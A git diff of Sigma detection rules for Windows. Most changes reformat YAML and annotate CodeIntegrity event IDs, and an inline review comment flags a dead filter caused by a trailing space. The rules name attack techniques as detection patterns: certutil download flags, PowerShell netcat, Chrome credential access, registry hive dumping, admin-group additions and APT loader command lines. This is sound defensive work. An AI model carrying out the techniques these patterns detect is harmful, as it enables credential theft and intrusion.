@@ -51,16 +51,19 @@ detection: - 8 - 12 filter_optional_msoffice: - FileNameBuffer|contains: \Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft - Shared\OFFICE + FileNameBuffer|contains: \Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE FileNameBuffer|endswith: \MSOXMLMF.DLL + # ProcessNameBuffer is AV products RequestedPolicy: 7 filter_optional_slack: + # Example: https://user-images.githubusercontent.com/112784902/197407680-96d4b662-8a59-4289-a483-b24d630ac2a9.png + # Even though it's the same DLL as the one used in the electron based app filter. We need to do a separate selection due to slack's folder naming convention with the version number :) FileNameBuffer|endswith: \Windows\System32\nvspcap64.dll ProcessNameBuffer|contains: \AppData\Local\slack\app- ProcessNameBuffer|endswith: \slack.exe RequestedPolicy: 8 filter_optional_firefox: + # Example: https://user-images.githubusercontent.com/62423083/197451483-70e89010-ed96-4357-8079-b5a061a239d6.png FileNameBuffer|endswith: - \Mozilla Firefox\mozavcodec.dll - \Mozilla Firefox\mozavutil.dll @@ -74,11 +77,13 @@ detection: - 8 - 12 filter_main_gac: + # Filtering the path containing this string because of multiple possible DLLs in that location FileNameBuffer|contains: \Windows\assembly\GAC\ ProcessNameBuffer|endswith: \mscorsvw.exe ProcessNameBuffer|contains: \Windows\Microsoft.NET\ RequestedPolicy: 8 filter_optional_google_drive: + # Example: \Program Files\Google\Drive File Stream\67.0.2.0\crashpad_handler.exe FileNameBuffer|contains: \Program Files\Google\Drive File Stream\ FileNameBuffer|endswith: \crashpad_handler.exe ProcessNameBuffer|endswith: \Windows\ImmersiveControlPanel\SystemSettings.exe 
@@ -87,18 +92,15 @@ detection: FileNameBuffer|endswith: \Trend Micro\Client Server Security Agent\perficrcperfmonmgr.dll RequestedPolicy: 8 filter_optional_mdns_responder: - FileNameBuffer|endswith: '\Program Files\National Instruments\Shared\mDNS - Responder\nimdnsNSP.dll ' + FileNameBuffer|endswith: '\Program Files\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll ' filter_optional_mcafee: FileNameBuffer|endswith: - \Program Files\McAfee\Endpoint Security\Threat Prevention\MfeAmsiProvider.dll - \Program Files\McAfee\MfeAV\AMSIExt.dll filter_optional_eset: FileNameBuffer|endswith: \Program Files\ESET\ESET Security\eamsi.dll - condition: codeintegrity_operational and (selection and not 1 of filter_main_* - and not 1 of filter_optional_*) + condition: codeintegrity_operational and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Antivirus and other third party products are known to trigger this rule quite - a lot. Initial filters and tuning is required before using this rule. + - Antivirus and other third party products are known to trigger this rule quite a lot. Initial filters and tuning is required before using this rule. level: low ruletype: Sigma diff --git a/sigma/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml b/sigma/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml index 86a098202..2344d95f3 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml 
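Review bot: The rejoined `filter_optional_mdns_responder` value still ends with a space inside the quotes (`...\nimdnsNSP.dll '`), so the `endswith` comparison can never match a path ending in `.dll` and the filter is dead. The single-line form should be `FileNameBuffer|endswith: \Program Files\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll`, unquoted like the neighbouring McAfee and ESET entries once the trailing space is gone. As a `filter_optional_*` entry the only effect today is that the intended false positive is not suppressed, but the rewrap was the moment to fix it.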
@@ -1,8 +1,7 @@ title: CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked id: 5daf11c3-022b-4969-adb9-365e6c078c7c status: experimental -description: Detects block events for files that are disallowed by code integrity - for protected processes +description: Detects block events for files that are disallowed by code integrity for protected processes references: - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations @@ -18,7 +17,7 @@ detection: codeintegrity_operational: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: - EventID: 3104 + EventID: 3104 # Windows blocked file %2 which has been disallowed for protected processes. condition: codeintegrity_operational and selection falsepositives: - Unlikely diff --git a/sigma/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml b/sigma/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml index 494377f01..6ba9a0877 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml 
@@ -1,8 +1,7 @@ title: CodeIntegrity - Blocked Image/Driver Load For Policy Violation id: e4be5675-4a53-426a-8c81-a8bb2387e947 status: experimental -description: Detects blocked load events that did not meet the authenticode signing - level requirements or violated the code integrity policy. +description: Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy. references: - https://twitter.com/wdormann/status/1590434950335320065 - https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log @@ -20,7 +19,7 @@ detection: codeintegrity_operational: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: - EventID: 3077 + EventID: 3077 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements or violated code integrity policy (Policy ID:%XX). condition: codeintegrity_operational and selection falsepositives: - Unknown diff --git a/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml b/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml index 6f1e5c39a..cf72d4d5a 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml @@ -18,7 +18,7 @@ detection: codeintegrity_operational: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: - EventID: 3023 + EventID: 3023 # The driver %2 is blocked from loading as the driver has been revoked by Microsoft. condition: codeintegrity_operational and selection falsepositives: - Unknown 
diff --git a/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml b/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml index 179fcefa7..afaff2738 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml @@ -18,8 +18,8 @@ detection: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: EventID: - - 3021 - - 3022 + - 3021 # Code Integrity determined a revoked kernel module %2 is loaded into the system. Check with the publisher to see if a new signed version of the kernel module is available. + - 3022 # Code Integrity determined a revoked kernel module %2 is loaded into the system. The image is allowed to load because kernel mode debugger is attached. condition: codeintegrity_operational and selection falsepositives: - Unlikely diff --git a/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml b/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml index 56ed79680..f150675f7 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml @@ -17,7 +17,7 @@ detection: codeintegrity_operational: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: - EventID: 3036 + EventID: 3036 # Windows is unable to verify the integrity of the file %2 because the signing certificate has been revoked. Check with the publisher to see if a new signed version of the kernel module is available. condition: codeintegrity_operational and selection falsepositives: - Unlikely diff --git a/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml b/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml index b33e8d153..232801454 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml 
+++ b/sigma/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml @@ -18,8 +18,8 @@ detection: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: EventID: - - 3032 - - 3035 + - 3032 # Code Integrity determined a revoked image %2 is loaded into the system. Check with the publisher to see if a new signed version of the image is available. + - 3035 # Code Integrity determined a revoked image %2 is loaded into the system. The image is allowed to load because kernel mode debugger is attached. condition: codeintegrity_operational and selection falsepositives: - Unlikely diff --git a/sigma/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml b/sigma/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml index 2d0634035..f7e1bed39 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml @@ -17,7 +17,7 @@ detection: codeintegrity_operational: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: - EventID: 3001 + EventID: 3001 # Code Integrity determined an unsigned kernel module %2 is loaded into the system. Check with the publisher to see if a signed version of the kernel module is available condition: codeintegrity_operational and selection falsepositives: - Unlikely diff --git a/sigma/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml b/sigma/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml index fee21c84a..a34397684 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml 
@@ -17,7 +17,7 @@ detection: codeintegrity_operational: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: - EventID: 3037 + EventID: 3037 # Code Integrity determined an unsigned image %2 is loaded into the system. Check with the publisher to see if a signed version of the image is available. condition: codeintegrity_operational and selection falsepositives: - Unlikely diff --git a/sigma/builtin/code_integrity/win_codeintegrity_whql_failure.yml b/sigma/builtin/code_integrity/win_codeintegrity_whql_failure.yml index bbecd5c25..0d61abd52 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_whql_failure.yml +++ b/sigma/builtin/code_integrity/win_codeintegrity_whql_failure.yml @@ -19,8 +19,8 @@ detection: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: EventID: - - 3082 - - 3083 + - 3082 # Code Integrity determined kernel module %2 that did not meet the WHQL requirements is loaded into the system. However, due to code integrity auditing policy, the image was allowed to load + - 3083 # Code Integrity determined kernel module %2 that did not meet the WHQL requirements is loaded into the system. Check with the publisher to see if a WHQL compliant kernel module is available filter_optional_vmware: FileNameBuffer: - system32\drivers\vsock.sys diff --git a/sigma/builtin/deprecated/posh_pm_powercat.yml b/sigma/builtin/deprecated/posh_pm_powercat.yml index f3a803386..f0b3c0fa1 100644 --- a/sigma/builtin/deprecated/posh_pm_powercat.yml +++ b/sigma/builtin/deprecated/posh_pm_powercat.yml 
@@ -1,8 +1,7 @@ title: Netcat The Powershell Version - PowerShell Module id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 status: deprecated -description: Adversaries may use a non-application layer protocol for communication - between host and C2 server or among infected hosts within a network +description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ - https://github.com/besimorhino/powercat diff --git a/sigma/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml b/sigma/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml index 32141e2ec..32d087621 100644 --- a/sigma/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml +++ b/sigma/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml @@ -4,16 +4,10 @@ status: deprecated author: frack113 date: 2021/12/20 modified: 2022/05/14 -description: 'Adversaries may acquire credentials from web browsers by reading files - specific to the target browser. - - Web browsers commonly save credentials such as website usernames and passwords - so that they do not need to be entered manually in the future. - - Web browsers typically store the credentials in an encrypted format within a credential - store. - - ' +description: | + Adversaries may acquire credentials from web browsers by reading files specific to the target browser. + Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. + Web browsers typically store the credentials in an encrypted format within a credential store. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md logsource: diff --git a/sigma/builtin/deprecated/posh_ps_azurehound_commands.yml b/sigma/builtin/deprecated/posh_ps_azurehound_commands.yml index 5a9dd2ae1..11c36e4fd 100644 
--- a/sigma/builtin/deprecated/posh_ps_azurehound_commands.yml +++ b/sigma/builtin/deprecated/posh_ps_azurehound_commands.yml @@ -1,8 +1,7 @@ title: AzureHound PowerShell Commands id: 83083ac6-1816-4e76-97d7-59af9a9ae46e status: deprecated -description: Detects the execution of AzureHound in PowerShell, a tool to gather data - from Azure for BloodHound +description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound references: - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html diff --git a/sigma/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml b/sigma/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml index 731300577..fe3a486ae 100644 --- a/sigma/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml +++ b/sigma/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml @@ -1,8 +1,7 @@ title: Execution via CL_Mutexverifiers.ps1 id: 39776c99-1c7b-4ba0-b5aa-641525eee1a4 status: deprecated -description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 - module +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module references: - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ - https://twitter.com/pabraeken/status/995111125447577600 diff --git a/sigma/builtin/deprecated/posh_ps_file_and_directory_discovery.yml b/sigma/builtin/deprecated/posh_ps_file_and_directory_discovery.yml index 18dd917ce..e76013dc6 100644 --- a/sigma/builtin/deprecated/posh_ps_file_and_directory_discovery.yml +++ b/sigma/builtin/deprecated/posh_ps_file_and_directory_discovery.yml 
@@ -1,16 +1,10 @@ title: Powershell File and Directory Discovery id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 status: deprecated -description: 'Adversaries may enumerate files and directories or may search in specific - locations of a host or network share for certain information within a file system. - - Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) - during automated discovery to shape follow-on behaviors, - - including whether or not the adversary fully infects the target and/or attempts - specific actions. - - ' +description: | + Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. + Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, + including whether or not the adversary fully infects the target and/or attempts specific actions. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md author: frack113 diff --git a/sigma/builtin/deprecated/posh_ps_susp_gwmi.yml b/sigma/builtin/deprecated/posh_ps_susp_gwmi.yml index ce492e176..71c2bc83e 100644 --- a/sigma/builtin/deprecated/posh_ps_susp_gwmi.yml +++ b/sigma/builtin/deprecated/posh_ps_susp_gwmi.yml 
@@ -1,8 +1,7 @@
 title: Suspicious Get-WmiObject
 id: 0332a266-b584-47b4-933d-a00b103e1b37
 status: deprecated
-description: The infrastructure for management data and operations that enables local
-    and remote management of Windows personal computers and servers
+description: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers
 references:
     - https://attack.mitre.org/datasources/DS0005/
     - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7
diff --git a/sigma/builtin/deprecated/powershell_suspicious_invocation_specific.yml b/sigma/builtin/deprecated/powershell_suspicious_invocation_specific.yml
index d7ffcd16f..394405215 100644
--- a/sigma/builtin/deprecated/powershell_suspicious_invocation_specific.yml
+++ b/sigma/builtin/deprecated/powershell_suspicious_invocation_specific.yml
@@ -11,8 +11,7 @@ modified: 2023/05/04
 logsource:
     product: windows
     service: powershell
-    definition: Script block logging must be enabled for 4104, Module Logging must
-        be enabled for 4103
+    definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103
 detection:
     powershell:
         Channel:
diff --git a/sigma/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml b/sigma/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml
index 42710d97d..5fd87989c 100644
--- a/sigma/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml
+++ b/sigma/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml
@@ -1,13 +1,12 @@
 title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction
 id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299
 related:
-    - id: fde7929d-8beb-4a4c-b922-be9974671667
-      type: derived
-description: Detects SyncAppvPublishingServer process execution which usually utilized
-    by adversaries to bypass PowerShell execution restrictions.
+    - id: fde7929d-8beb-4a4c-b922-be9974671667
+      type: derived
+description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
 references:
     - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
-author: "Ensar \u015Eamil, @sblmsrsn, OSCD Community"
+author: Ensar Şamil, @sblmsrsn, OSCD Community
 date: 2020/10/05
 modified: 2022/04/11
 tags:
diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml b/sigma/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml
index fc498a037..5ddfecdfc 100644
--- a/sigma/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml
@@ -1,8 +1,7 @@
 title: APT29
 id: 033fe7d6-66d1-4240-ac6b-28908009c71f
 status: deprecated
-description: This method detects a suspicious PowerShell command line combination
-    as used by APT29 in a campaign against U.S. think tanks.
+description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.
 references:
     - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
     - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
@@ -21,7 +20,7 @@ detection:
         EventID: 4688
         Channel: Security
     selection:
-        CommandLine|contains|all:
+        CommandLine|contains|all:
             - -noni
             - -ep
             - bypass
diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_dragonfly.yml b/sigma/builtin/deprecated/proc_creation_win_apt_dragonfly.yml
index 89b336eff..59a96c931 100644
--- a/sigma/builtin/deprecated/proc_creation_win_apt_dragonfly.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_apt_dragonfly.yml
@@ -22,7 +22,7 @@ detection:
         EventID: 4688
         Channel: Security
     selection:
-        NewProcessName|endswith: \crackmapexec.exe
+        NewProcessName|endswith: \crackmapexec.exe
     condition: process_creation and selection
 falsepositives:
     - Unknown
diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_gallium.yml b/sigma/builtin/deprecated/proc_creation_win_apt_gallium.yml
index 3654f3224..f86863770 100644
--- a/sigma/builtin/deprecated/proc_creation_win_apt_gallium.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_apt_gallium.yml
@@ -1,11 +1,10 @@
 title: GALLIUM Artefacts
 id: 18739897-21b1-41da-8ee4-5b786915a676
 related:
-    - id: 440a56bf-7873-4439-940a-1c8a671073c2
-      type: derived
+    - id: 440a56bf-7873-4439-940a-1c8a671073c2
+      type: derived
 status: deprecated
-description: Detects artefacts associated with activity group GALLIUM - Microsoft
-    Threat Intelligence Center indicators released in December 2019.
+description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
 references:
     - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/
     - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
@@ -25,7 +24,7 @@ detection:
         EventID: 4688
         Channel: Security
     legitimate_process_path:
-        NewProcessName|contains:
+        NewProcessName|contains:
             - :\Program Files(x86)\
             - :\Program Files\
     legitimate_executable:
diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml b/sigma/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml
index 07aeb0351..83edbab98 100644
--- a/sigma/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml
@@ -19,11 +19,11 @@ detection:
         EventID: 4688
         Channel: Security
     selection:
-        - CommandLine|contains|all:
-            - localgroup
-            - admin
-            - /add
-        - CommandLine|contains: \Win64.exe
+        - CommandLine|contains|all:
+            - localgroup
+            - admin
+            - /add
+        - CommandLine|contains: \Win64.exe
     condition: process_creation and selection
 falsepositives:
     - Unknown
diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml b/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml
index 278eb994e..749980cca 100644
--- a/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml
@@ -1,8 +1,7 @@
 title: Lazarus Activity Apr21
 id: 4a12fa47-c735-4032-a214-6fab5b120670
 status: deprecated
-description: Detects different process creation events as described in Malwarebytes's
-    threat report on Lazarus group activity
+description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity
 references:
     - https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/
 author: Bhabesh Raj
@@ -20,15 +19,15 @@ detection:
         EventID: 4688
         Channel: Security
     selection_1:
-        CommandLine|contains|all:
-            - mshta
+        CommandLine|contains|all:
+            - mshta # Covered by cc7abbd0-762b-41e3-8a26-57ad50d2eea3
             - .zip
     selection_2:
         ParentProcessName: C:\Windows\System32\wbem\wmiprvse.exe
-        NewProcessName: C:\Windows\System32\mshta.exe
+        NewProcessName: C:\Windows\System32\mshta.exe
     selection_3:
         ParentProcessName|contains: :\Users\Public\
-        NewProcessName: C:\Windows\System32\rundll32.exe
+        NewProcessName: C:\Windows\System32\rundll32.exe
     condition: process_creation and (1 of selection_*)
 falsepositives:
     - Should not be any false positives
diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml b/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml
index cb7881bf6..3c8c6a8a4 100644
--- a/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml
@@ -1,8 +1,7 @@
 title: Lazarus Loaders
 id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
 status: deprecated
-description: Detects different loaders as described in various threat reports on Lazarus
-    group activity
+description: Detects different loaders as described in various threat reports on Lazarus group activity
 references:
     - https://www.hvs-consulting.de/lazarus-report/
     - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
@@ -21,27 +20,26 @@ detection:
         EventID: 4688
         Channel: Security
     selection_cmd1:
-        CommandLine|contains|all:
+        CommandLine|contains|all:
             - 'cmd.exe /c '
             - ' -p 0x'
     selection_cmd2:
-        CommandLine|contains:
+        CommandLine|contains:
             - C:\ProgramData\
             - C:\RECYCLER\
     selection_rundll1:
-        CommandLine|contains|all:
+        CommandLine|contains|all:
             - 'rundll32.exe '
             - C:\ProgramData\
     selection_rundll2:
-        CommandLine|contains:
+        CommandLine|contains:
             - .bin,
             - .tmp,
             - .dat,
             - .io,
             - .ini,
             - .db,
-    condition: process_creation and (( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1
-        and selection_rundll2 ))
+    condition: process_creation and (( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 and selection_rundll2 ))
 falsepositives:
     - Unknown
 level: critical
diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml b/sigma/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml
index 6c968d98e..39a87378d 100644
--- a/sigma/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml
@@ -19,8 +19,8 @@ detection:
         EventID: 4688
         Channel: Security
     selection:
-        CommandLine|contains: DataExchange.dll
-        NewProcessName|endswith:
+        CommandLine|contains: DataExchange.dll
+        NewProcessName|endswith:
             - \powershell.exe
             - \pwsh.exe
         ParentProcessName|endswith: \excel.exe
diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml b/sigma/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml
index 5b129bb99..7597ea71b 100644
--- a/sigma/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml
@@ -1,8 +1,7 @@
 title: TA505 Dropper Load Pattern
 id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4
 status: deprecated
-description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious
-    documents
+description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents
 references:
     - https://twitter.com/ForensicITGuy/status/1334734244120309760
 author: Florian Roth (Nextron Systems)
@@ -22,8 +21,8 @@ detection:
     selection_parent:
         ParentProcessName|endswith: \wmiprvse.exe
     selection_mshta:
-        - NewProcessName|endswith: \mshta.exe
-        - OriginalFileName: mshta.exe
+        - NewProcessName|endswith: \mshta.exe
+        - OriginalFileName: mshta.exe
     condition: process_creation and (all of selection_*)
 falsepositives:
     - Unknown
diff --git a/sigma/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml b/sigma/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml
index f4053c3e4..3a2274af6 100644
--- a/sigma/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml
@@ -1,8 +1,7 @@
 title: Suspicious Certutil Command Usage
 id: e011a729-98a6-4139-b5c4-bf6f6dd8239a
 status: deprecated
-description: Detects a suspicious Microsoft certutil execution with sub commands like
-    'decode' sub command, which is sometimes used to decode malicious code
+description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
 references:
     - https://twitter.com/JohnLaTwC/status/835149808817991680
     - https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/
@@ -32,10 +31,10 @@ detection:
         EventID: 4688
         Channel: Security
     selection_img:
-        - NewProcessName|endswith: \certutil.exe
-        - OriginalFileName: CertUtil.exe
+        - NewProcessName|endswith: \certutil.exe
+        - OriginalFileName: CertUtil.exe
     selection_cli:
-        CommandLine|contains:
+        CommandLine|contains:
             - ' -decode '
             - ' -decodehex '
             - ' -urlcache '
@@ -53,7 +52,6 @@ fields:
     - CommandLine
     - ParentCommandLine
 falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored
-        environment
+    - False positives depend on scripts and administrative tools used in the monitored environment
 level: high
 ruletype: Sigma
diff --git a/sigma/builtin/deprecated/proc_creation_win_cmd_read_contents.yml b/sigma/builtin/deprecated/proc_creation_win_cmd_read_contents.yml
index 896ac64c1..2dcd3b134 100644
--- a/sigma/builtin/deprecated/proc_creation_win_cmd_read_contents.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_cmd_read_contents.yml
@@ -18,17 +18,17 @@ detection:
         EventID: 4688
         Channel: Security
     selection_cmd:
-        - OriginalFileName: Cmd.Exe
-        - NewProcessName|endswith: \cmd.exe
+        - OriginalFileName: Cmd.Exe
+        - NewProcessName|endswith: \cmd.exe
     selection_read:
-        - ParentCommandLine|contains|all:
-            - cmd
-            - '/r '
-            - <
-        - CommandLine|contains|all:
-            - cmd
-            - '/r '
-            - <
+        - ParentCommandLine|contains|all:
+            - cmd
+            - '/r '
+            - <
+        - CommandLine|contains|all:
+            - cmd
+            - '/r '
+            - <
     condition: process_creation and (all of selection_*)
 falsepositives:
     - Legitimate use
diff --git a/sigma/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml b/sigma/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml
index e97dd5056..b92f4aded 100644
--- a/sigma/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml
@@ -1,8 +1,7 @@
 title: Cmd Stream Redirection
 id: 70e68156-6571-427b-a6e9-4476a173a9b6
 status: deprecated
-description: Detects the redirection of an alternate data stream (ADS) of / within
-    a Windows command line session
+description: Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session
 references:
     - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt
 author: frack113
@@ -19,12 +18,12 @@ detection:
         EventID: 4688
         Channel: Security
     selection:
-        CommandLine|contains|all:
+        CommandLine|contains|all:
             - '> '
             - ':'
-        NewProcessName|endswith: \cmd.exe
+        NewProcessName|endswith: \cmd.exe
     filter:
-        CommandLine|contains: ' :\'
+        CommandLine|contains: ' :\'
     condition: process_creation and (selection and not filter)
 falsepositives:
     - Unknown
diff --git a/sigma/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml b/sigma/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml
index 35cbc2dcf..b4bb7dbcc 100644
--- a/sigma/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml
@@ -18,14 +18,14 @@ detection:
         EventID: 4688
         Channel: Security
     selection_1:
-        - NewProcessName|endswith: \reg.exe
